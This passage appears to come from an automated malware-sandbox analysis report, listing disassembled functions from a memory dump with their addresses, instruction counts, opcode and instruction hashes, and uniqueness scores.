                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 740e9389330066a62f56af156820337016bcc0bd8eee1bd382657f9a9748b10f
                                                                                        • Instruction ID: 57262491b4fccd5eb7ee012270f44485d952d2e4d8f8e4e3342dcd989b686f9d
                                                                                        • Opcode Fuzzy Hash: 740e9389330066a62f56af156820337016bcc0bd8eee1bd382657f9a9748b10f
                                                                                        • Instruction Fuzzy Hash: 53912C31E102589FDB35AB68CC45BBDBBF4EB01714F1502A5FA21A72E2D774AD44CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BCC600, Relevance: .2, Instructions: 225COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a7417589373541e8718a9d4a308ccb8ba7bdf18cea1898b3cb8c08fd0a8fb2d7
                                                                                        • Instruction ID: 862f93b933f00f0e37b6896eb5d4e18b8897fe8875396bbc213f7caab68e1df8
                                                                                        • Opcode Fuzzy Hash: a7417589373541e8718a9d4a308ccb8ba7bdf18cea1898b3cb8c08fd0a8fb2d7
                                                                                        • Instruction Fuzzy Hash: 4281ACB566C3018BCB35CE14C881B6EB3E8EB84354F244A6EFD559B241D330EE41DBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C5B8D0, Relevance: .2, Instructions: 199COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f4d247505a0659780315ba2b9008f02be067c524cc62ba8bfd83d2fc43042c85
                                                                                        • Instruction ID: 7c9ca2fb932ff0a0dcb1d3be3c4de707429e37733b2b07bd82613986e6fe7abc
                                                                                        • Opcode Fuzzy Hash: f4d247505a0659780315ba2b9008f02be067c524cc62ba8bfd83d2fc43042c85
                                                                                        • Instruction Fuzzy Hash: 9971013A200701AFD7318F15C845F66BBF5EB44722F244528EA658B2E1DB70EE88EB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C46DC9, Relevance: .2, Instructions: 199COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                        • Instruction ID: 241231e28219aea499b61196c8aaffe832a94081168c5e4d22210de724112c56
                                                                                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                        • Instruction Fuzzy Hash: 1B717971A00219EFCB11DFA9C984EEEBBF9FF48710F144169E505EB291DB30AA41DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF2AE4, Relevance: .2, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4b9cc01b437bfa53b223650dcf8a59fd5a8911e00f950d8eea0276d3f9be0883
                                                                                        • Instruction ID: 010f2d4609e6427893dde50943d73a2135b733e26aea2ed3370c688889b71ae6
                                                                                        • Opcode Fuzzy Hash: 4b9cc01b437bfa53b223650dcf8a59fd5a8911e00f950d8eea0276d3f9be0883
                                                                                        • Instruction Fuzzy Hash: E451E076B001298FCB18CF1CC8809BDB7F5FB88700B15859AED46AB365D734AE49DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C8AE44, Relevance: .2, Instructions: 152COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f8098080c4c2db795ec8018b4df5778cde13a06b01c3d010beb5e01c15c28c4
                                                                                        • Instruction ID: c1e635a2da5f045ec9bed8d595287a4dd5398e0d4b10418664a1b784f4750eda
                                                                                        • Opcode Fuzzy Hash: 8f8098080c4c2db795ec8018b4df5778cde13a06b01c3d010beb5e01c15c28c4
                                                                                        • Instruction Fuzzy Hash: B24149B0700610ABF725FB66C884B3BB399EF84718F08461AF926C7290DB30DD01D79A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BEDBE9, Relevance: .1, Instructions: 149COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a48f330cb68bd9db43f3f00e631ae59e6171ed501821ba9510ab1d3ec6ed0f51
                                                                                        • Instruction ID: ffaac6b74fe1655b59270d4401821f7ba193199d407e9e0807a64d7d6a43c961
                                                                                        • Opcode Fuzzy Hash: a48f330cb68bd9db43f3f00e631ae59e6171ed501821ba9510ab1d3ec6ed0f51
                                                                                        • Instruction Fuzzy Hash: 18518D75A01645DFCB14CFA9C890AAEFBF5FF48350F2085AAE555A7340DBB0AE44CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BDEF40, Relevance: .1, Instructions: 147COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                        • Instruction ID: 28655c890c720f0faa1e574d6a8c3446bdff598ced8c25b4cb31b29dc8cfdc93
                                                                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                        • Instruction Fuzzy Hash: 8A51AE30A082469BEB14CF68C0D07AEFBF1EF15314F2881EAD4665B382E375A989D751
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C9740D, Relevance: .1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                        • Instruction ID: fe6e5f8e886c86e3d57ccde0d979ff3e75b4f5fb33924f4232ccab3dc64d87eb
                                                                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                        • Instruction Fuzzy Hash: BD518B71601606EFCF15CF54C485A96BBF5FF45304F15C1AAE9089F262E371EA86CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF2990, Relevance: .1, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 580fb097905b2de37f5896441716a8436903b17460f38849e97dce4ff0e10f80
                                                                                        • Instruction ID: bc3273e1a8d2c1442b900a87cd3189e7f64f1475dad378696c40a06911b07264
                                                                                        • Opcode Fuzzy Hash: 580fb097905b2de37f5896441716a8436903b17460f38849e97dce4ff0e10f80
                                                                                        • Instruction Fuzzy Hash: 9D515771900619DFCF25DF59C880AEEBBB5FF08314F1580A5FA10AB261D3359D96DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF4BAD, Relevance: .1, Instructions: 131COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 473d7f182e6ce62b74d9beae09b05b2e553a80a76023a786265dbb5dc6906d54
                                                                                        • Instruction ID: bf0932c1bf785f7eedc5da27d1097d0613e043f96b9942dfbf88f56963c5ca9f
                                                                                        • Opcode Fuzzy Hash: 473d7f182e6ce62b74d9beae09b05b2e553a80a76023a786265dbb5dc6906d54
                                                                                        • Instruction Fuzzy Hash: D341A135A01228ABCB20DF64C941FEA77F4EF45710F4140E9EA08AB251DB74DE84CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF4D3B, Relevance: .1, Instructions: 131COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 27673325987e782fd277bccccae9696169e94f147eccc0291d995c802fc5b6bb
                                                                                        • Instruction ID: 0ad1bec23ee8931e88d17e568b6a0191f292e15121c60aa3cd7e701ec856c373
                                                                                        • Opcode Fuzzy Hash: 27673325987e782fd277bccccae9696169e94f147eccc0291d995c802fc5b6bb
                                                                                        • Instruction Fuzzy Hash: 6741BE71A40318AFEB25DF14DC81FBBB7E9EB45710F0040E9EA499B281DB74DE48CA91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BD8A0A, Relevance: .1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d924e822d5c78d64b34909a73f584cb0a603989327e8a99b75b4e47f20d6444e
                                                                                        • Instruction ID: 3aee93e3820f4295e64d190e2d1af120fac9fd3dcfb748dfb70d8d98a358904f
                                                                                        • Opcode Fuzzy Hash: d924e822d5c78d64b34909a73f584cb0a603989327e8a99b75b4e47f20d6444e
                                                                                        • Instruction Fuzzy Hash: 1F415EB5A4022C9BDB24DF19CC88AA9F7F4EB54301F1045EBE91997352EB719E80CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C8AA16, Relevance: .1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                        • Instruction ID: c4014785ccbb754f528e284e140a4686b848f46d7a3e32829cadb72075d4628b
                                                                                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                        • Instruction Fuzzy Hash: 5D313732F001046BEB15AB6ACC45BBFF7BBEF80314F15806AE810A7251DA70CE00C759
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C8FDE2, Relevance: .1, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                        • Instruction ID: dcb6ba729977706fa5d34887c55ee7fc06a34c1ec572da2bedbb6ee23c26e227
                                                                                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                        • Instruction Fuzzy Hash: 60310332200644AFD722AB69C845F6ABBE9EBC5344F18407CF956CB352DB74DD42C728
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C8EA55, Relevance: .1, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                        • Instruction ID: c2d1e2871118fc4aaf28c7f90f6e31956a6e176c64081b7976a3c07592a72573
                                                                                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                        • Instruction Fuzzy Hash: 2131D2322047059BC719EF25CC81A6BB7E9FBC0714F04492DF56287341EE30E905CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C469A6, Relevance: .1, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 777616d5be8ada41b5f7691f229a8c78db372ccbd6fca02e22fdf02fb689df84
                                                                                        • Instruction ID: 07604d78b142c5ec2c7065391c799755911c357464625c90fd8db2cad973a40f
                                                                                        • Opcode Fuzzy Hash: 777616d5be8ada41b5f7691f229a8c78db372ccbd6fca02e22fdf02fb689df84
                                                                                        • Instruction Fuzzy Hash: 0B4189B1D00608AFDB24CFA5C841BFEBBF8FF49718F14816AE914A7291EB709905DB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BC5210, Relevance: .1, Instructions: 107COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 112574f1d552aa1f3505845f01bcb8bd37fc58c06a2dacc74274c973d5c1d6d0
                                                                                        • Instruction ID: e0b5a20890504a879c1ebd23faccd74b48d1b8b2332fb44c2bb79c6a3a1ebb32
                                                                                        • Opcode Fuzzy Hash: 112574f1d552aa1f3505845f01bcb8bd37fc58c06a2dacc74274c973d5c1d6d0
                                                                                        • Instruction Fuzzy Hash: 32310531642A109BCB36AB58D881F6677E5FF10760F20466AF8650B9E2EB70FD40D690
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C03D43, Relevance: .1, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 463514a8b05de6eaee0f5452be123178e680d8a5623522e171245774c4828157
                                                                                        • Instruction ID: f68fc1dec9027f534eceb00fc6739ee40dfeb5783229d9ceb2d24f07c2cd9159
                                                                                        • Opcode Fuzzy Hash: 463514a8b05de6eaee0f5452be123178e680d8a5623522e171245774c4828157
                                                                                        • Instruction Fuzzy Hash: 3A31BE31A146A5DFCB248F2AC841A6ABBE9EF56700B15846AE859CB3D0E730DE40D790
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BFA61C, Relevance: .1, Instructions: 106COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d878937f11ed219f7764d970e88ce5750c3465fc36383f58d5a9da954b653413
                                                                                        • Instruction ID: 5f80d02e7e37e0011df008c6b71b3ccc5071ca0bcd93bdfddffb29bcae911d82
                                                                                        • Opcode Fuzzy Hash: d878937f11ed219f7764d970e88ce5750c3465fc36383f58d5a9da954b653413
                                                                                        • Instruction Fuzzy Hash: BD4166B5A14209DFCB18CF58D880BA9BBF1FB49304F18C1A9E908AB391C774AD41CF94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C47016, Relevance: .1, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8bdee538ff958aa2799d253d79f57bd49dd6e1e9a5d3a7349d1dfe1dab67054e
                                                                                        • Instruction ID: c435c9076a6307ade880429cc03f2eaba88a2027abbd5c99e49b6bf5873c2852
                                                                                        • Opcode Fuzzy Hash: 8bdee538ff958aa2799d253d79f57bd49dd6e1e9a5d3a7349d1dfe1dab67054e
                                                                                        • Instruction Fuzzy Hash: F33195726087919BC321DF28C941A6AB7E5FF88700F044A29F8A997691E730ED04D7A6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BEC182, Relevance: .1, Instructions: 104COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                        • Instruction ID: 93049ab4d4872081f99b838c6ed4172d82be7540107527ea65bb07a6c178afba
                                                                                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                        • Instruction Fuzzy Hash: A23146726055C6AEDB04EBB5C481BE9FBD4FF52300F1841AAE51857302DB346E0ADBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C73D40, Relevance: .1, Instructions: 98COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7dfa2fbb6d11ce748f4cc028baff9ebd8958bd8a3ca8cff00f439018f5f33928
                                                                                        • Instruction ID: 3718c7fe8d1fabbdb1b89fe0c05cd41933181ba46c3ba5640cd2677fefce47d0
                                                                                        • Opcode Fuzzy Hash: 7dfa2fbb6d11ce748f4cc028baff9ebd8958bd8a3ca8cff00f439018f5f33928
                                                                                        • Instruction Fuzzy Hash: F4318BB1609342CFCB14DF18D98195ABBE5FF85700F0489AEF4989B291D730DE08DB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BFA70E, Relevance: .1, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 16ec550348894bea8553aaa7ba50d892400f89b8669498faaa92b274a0555c02
                                                                                        • Instruction ID: 7eba168cda89a213c96fd584af66a272260dd705bf4ba91954593cce910ad2ec
                                                                                        • Opcode Fuzzy Hash: 16ec550348894bea8553aaa7ba50d892400f89b8669498faaa92b274a0555c02
                                                                                        • Instruction Fuzzy Hash: 1D31C1B16682049FCB19DB08DC81F69B7F9FBC4710F140B9AE90997690D7B0AD05CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF61A0, Relevance: .1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 91db89c5e91f98f3187d45ff63f456d0828220a037b8a7ff9e5114a0858e4254
                                                                                        • Instruction ID: 0afd65bc9784cf0027f8984c79d6d726e98f07ee3a020ef8b70dc6e97e7684d5
                                                                                        • Opcode Fuzzy Hash: 91db89c5e91f98f3187d45ff63f456d0828220a037b8a7ff9e5114a0858e4254
                                                                                        • Instruction Fuzzy Hash: 7A318FB16197018FD360CF19C851B2AB7E5FB88B10F1549ADF9A497351E770DD04CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BCAA16, Relevance: .1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 097b1d9aaa039e2c150d990f98528f09c974afdba48fa07c1e007d84bd45848d
                                                                                        • Instruction ID: 2564e522c487acf1230fceeabd00b4183ac77cb0c8406911b544bb80f8909451
                                                                                        • Opcode Fuzzy Hash: 097b1d9aaa039e2c150d990f98528f09c974afdba48fa07c1e007d84bd45848d
                                                                                        • Instruction Fuzzy Hash: 5F31A071A00229ABCB15AF64CD82B7EB7F9EF04700F0140AAF901E7291E7749E11DBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C04A2C, Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cbe3e364154d0fc1bc4879fe7729c4214a3a7d0609e0a6492367a0530b368351
                                                                                        • Instruction ID: ca55452624f24214c0527a852bb93236c35f5c7743a958c77039cf7120d41f7e
                                                                                        • Opcode Fuzzy Hash: cbe3e364154d0fc1bc4879fe7729c4214a3a7d0609e0a6492367a0530b368351
                                                                                        • Instruction Fuzzy Hash: 4E310072385651DBC7259F15C981B2BBBE8FF84B10F14056DFA660B281CBB0DD05DB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C08EC7, Relevance: .1, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a2f353200c21910ad42c64ba42efa2913a437808e8cf35981c55e29332fa7b3b
                                                                                        • Instruction ID: dea5e8444f3793f7c3d04b7997ec189ab351b8ff94696a87fea178185dd1bd95
                                                                                        • Opcode Fuzzy Hash: a2f353200c21910ad42c64ba42efa2913a437808e8cf35981c55e29332fa7b3b
                                                                                        • Instruction Fuzzy Hash: 8E41A3B1D003189FDB14CFAAD981AADFBF4FB48310F5081AEE559A7241EB705A45CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BFE730, Relevance: .1, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c358cf3aa134c0fd4518b4ed54eb93aab7757009a206bc463fc499b66037ff82
                                                                                        • Instruction ID: 1eb91dc5c7db5bb0c20904251ac312f73606aa338839d1e9145e6ceb69b4c816
                                                                                        • Opcode Fuzzy Hash: c358cf3aa134c0fd4518b4ed54eb93aab7757009a206bc463fc499b66037ff82
                                                                                        • Instruction Fuzzy Hash: 53318D75A14249AFD744DF58D841BAAB7E4FB09310F148296FA14CB351D631ED80CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BFBC2C, Relevance: .1, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 53a9eee92d1251608495295b4769bb36e5f8fce26eb962c116b64755e492b0db
                                                                                        • Instruction ID: 2956afe4fe8906e14012834f3f02d629e31636a4f88419aa09c71a183560b1dd
                                                                                        • Opcode Fuzzy Hash: 53a9eee92d1251608495295b4769bb36e5f8fce26eb962c116b64755e492b0db
                                                                                        • Instruction Fuzzy Hash: 2431EE7AA006199BCF11EF58D8C0BBA73E8EB18310F1441B9EE45DB201EB78DD098B84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BC9100, Relevance: .1, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d42bfb8685c767c5b0a34573b52e3f60eeaaa46cfa819e6e0bd87b3e8c1e0a4a
                                                                                        • Instruction ID: ab8dd1d4df3d89d3e7a8eccb939d3f220c737e0138189b0baa637d96c5e81f27
                                                                                        • Opcode Fuzzy Hash: d42bfb8685c767c5b0a34573b52e3f60eeaaa46cfa819e6e0bd87b3e8c1e0a4a
                                                                                        • Instruction Fuzzy Hash: 6631C3B5A00286EFEB25DB68C48EFACB7F1BB49720F28819DD41477251C734AD84CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BF1DB5, Relevance: .1, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                        • Instruction ID: 3080abf512106f92705cea1355a40db054aaf613f211b01ee5a43cfb5953ca83
                                                                                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                        • Instruction Fuzzy Hash: 16216B72A00159EBD721CF9DC880EBBBBFDEF85740F1148A5FA0597210D634AE01DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BE0050, Relevance: .1, Instructions: 81COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4df2adbaccec640a136b471ba9b9af4d2055b3b9e58026367e20c2a561bb67c5
                                                                                        • Instruction ID: 88b333c00b020215befab02b6463b73d248bbd364de29b0052fbea26ef37952d
                                                                                        • Opcode Fuzzy Hash: 4df2adbaccec640a136b471ba9b9af4d2055b3b9e58026367e20c2a561bb67c5
